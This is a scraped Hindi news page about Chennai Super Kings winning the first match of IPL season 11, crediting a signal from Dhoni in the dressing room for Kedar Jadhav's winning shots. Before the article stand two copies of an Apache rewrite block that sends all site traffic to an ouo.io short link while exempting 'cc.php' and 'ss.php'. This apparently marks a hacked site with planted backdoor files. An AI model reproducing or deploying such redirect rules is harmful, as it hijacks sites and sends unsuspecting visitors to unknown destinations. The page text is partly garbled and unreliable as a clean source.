
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 347
Previous Nextमुंबई। इंडियन प्रीमियर लीग (आईपीएल) के 11वें सीजन के पहले मैच में चेन्नई सुपरकिंग्स (सीएसके) की जीत का हीरो भले ही ड्वेन ब्रावो और केदार जाधव को माना जा रहा हो, लेकिन इनके अलावा कैप्टन कूल धोनी का भी बहुत बड़ा हाथ था। इंजरी के बावजूद जब केदार जाधव बल्लेबाजी के लिए उतरे, तो धोनी ड्रेसिंग रूम में खड़े काफी चिंतित नजर आ रहे थे।
आखिरी ओवर था, सीएसके का आखिरी विकेट था और जीत के लिए सात रनों की जरूरत थी। मुंबई इंडियंस की ओर से मुस्तफिजुर रही गेंदबाजी कर रहे थे। पहली तीन गेंद पर जब कोई रन नहीं बना, तो धोनी की चेहरे पर टेंशन साफ झलकने लगी। उन्होंने ड्रेसिंग रूम से कुछ इशारा किया। उस इशारे ने अचानक से पूरे मैच का नक्शा ही पलट डाला।
दरअसल, जब पहली तीन गेंद पर कोई रन नहीं बना, तो धोनी की बेचैनी काफी बढ़ गई थी। उन्होंने ड्रेसिंग रूम से ही इशारा किया कि जाधव किस तरह शॉट खेलें। फिर क्या था अगली ही गेंद पर जाधव जमीन पर लोट गए, लेकिन लोटने से पहले गेंद को छक्के के लिए बाउंड्री लाइन के पार पहुंचा दिया। इस तरह से धोनी के एक इशारा ने सीएसके को मुश्किल से उबार दिया। तीन गेंद पर सात रनों से स्कोर हो गया दो गेंद पर जीत के लिए एक रन। अगली ही गेंद पर जाधव ने चौका जड़ा और सीएसके ने मैच अपने नाम कर लिया। कैप्टन कूल महेंद्र सिंह धौनी ने मैच के बाद महज स्माइल देकर खुशी जाहिर की। जहां एक ओर पूरी टीम खुशी से झूम उठी वहीं धोनी के चेहरे पर जीत का संतोष नजर आया। यही सब बातें धोनी को दुनिया के बाकी कप्तानों से बिल्कुल जुदा कर देती हैं। धोनी ने मैच के बाद ड्वेन ब्रावो को जीत का हीरो करार दिया।